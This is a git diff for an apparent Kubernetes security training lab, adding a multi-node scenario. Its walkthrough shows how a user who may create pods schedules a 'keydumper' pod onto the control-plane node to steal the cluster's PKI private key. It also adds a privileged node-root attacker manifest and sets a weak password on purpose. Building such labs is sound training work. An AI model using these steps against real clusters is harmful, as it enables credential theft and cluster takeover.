diff --git a/Scenario Setups/ssh-to-create-pod-easy.md b/Scenario Setups/ssh-to-create-pod-easy.md index 85a97f0..abe7af5 100644 --- a/Scenario Setups/ssh-to-create-pod-easy.md +++ b/Scenario Setups/ssh-to-create-pod-easy.md @@ -2,7 +2,7 @@ This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run -- `ansible-playbook ssh-to-create-pods-easy.yml` +- `ansible-playbook ssh-to-create-pod-easy.yml` Then get a note of the IP address of the Kubernetes cluster with diff --git a/Scenario Setups/ssh-to-create-pod-multi-node.md b/Scenario Setups/ssh-to-create-pod-multi-node.md new file mode 100644 index 0000000..b1cc20c --- /dev/null +++ b/Scenario Setups/ssh-to-create-pod-multi-node.md @@ -0,0 +1,25 @@ +## SSH to Create Pod - Easy + +This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run + +- `ansible-playbook ssh-to-create-pod-multi-node.yml` + +Then get a note of the IP address of the worker node in the cluster by running + +``` +docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' sshcpmn-worker +``` + +Connect to your client container + +``` +docker exec -it client /bin/bash +``` + +and from there + +``` +ssh -p 32001 sshuser@[worker node ip] +``` + +The password for the sshuser account is `sshuser` \ No newline at end of file diff --git a/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md b/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md new file mode 100644 index 0000000..0e88982 --- /dev/null +++ b/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md @@ -0,0 +1,24 @@ +## SSH to Create Pod - Easy + +## Compromising the cluster + +3. `kubectl get po -n kube-system` will fail (user doesn't have those rights) +4. `kubectl get po` will work and give you a list of pods in the default namespace +At this point there's several ways to achieve the goal, lets go with hostpath, however as we have a multi-node cluster, we need to make sure that our pod will land on the control plane node that has the key available. + +5. There's two steps needed to modify the keydumper manifest to have this work. First, copy the `/key-dumper-pod.yml` file to `/home/sshuser/`, then add the following lines to the spec section of the manifest to allow it to schedule to a control plane node :- +```yaml + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule +``` + +6. Then we need to specify the node to land on , get the nodes with `kubectl get nodes` then add the following line to the spec. section of the manifest. +```yaml + nodeName: sshcpmn-control-plane +``` + + +5. Now we need to create a pod that dumps out the PKI private key `kubectl create -f keydumper.yml` +6. and the key should be in the logs `kubectl logs keydumper-pod` +7. profit! diff --git a/attacker_manifests/noderoot.yml b/attacker_manifests/noderoot.yml index af0d381..807c988 100644 --- a/attacker_manifests/noderoot.yml +++ b/attacker_manifests/noderoot.yml @@ -7,6 +7,9 @@ metadata: name: noderootpod labels: spec: + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule hostNetwork: true hostPID: true hostIPC: true diff --git a/kubeadm_configs/multi-node-cluster.yml b/kubeadm_configs/multi-node-cluster.yml new file mode 100644 index 0000000..d12c20d --- /dev/null +++ b/kubeadm_configs/multi-node-cluster.yml @@ -0,0 +1,6 @@ +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 + +nodes: +- role: control-plane +- role: worker diff --git a/ssh-to-create-pods-multi-node.yml b/ssh-to-create-pods-multi-node.yml new file mode 100644 index 0000000..d55d0d9 --- /dev/null +++ b/ssh-to-create-pods-multi-node.yml @@ -0,0 +1,43 @@ +#!/usr/bin/env ansible-playbook +--- +- name: Start up a kind cluster + hosts: localhost + vars: + cluster_name: sshcpmn + # This needs to be the cluster name with -control-plane added + container_name: sshcpmn-control-plane + cluster_config: multi-node-cluster.yml + kubernetes_version: v1.18.2 + + tasks: + - import_tasks: ./ansible_tasks/setup_kind_custom_config.yaml + + +- name: Setup Cluster + hosts: sshcpmn-control-plane + connection: docker + vars: + ansible_python_interpreter: /usr/bin/python3 + + tasks: + - import_tasks: ./ansible_tasks/setup_kubeconfig.yml + - import_tasks: ./ansible_tasks/setup_ssh_pod.yml + + - name: Copy Role Manifest + copy: + src: ./manifests/pod-manager.yml + dest: /root + + - name: Apply Role Manifest + command: kubectl create -f /root/pod-manager.yml + + - name: Give the default service account rights to manage pods + command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts + + - name: Create a clusterrole for reading nodes + command: kubectl create clusterrole node-reader --verb=get,list --resource=nodes + + - name: Give the default service account rights to get nodes + command: kubectl create clusterrolebinding serviceaccounts-read-nodes --clusterrole=node-reader --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file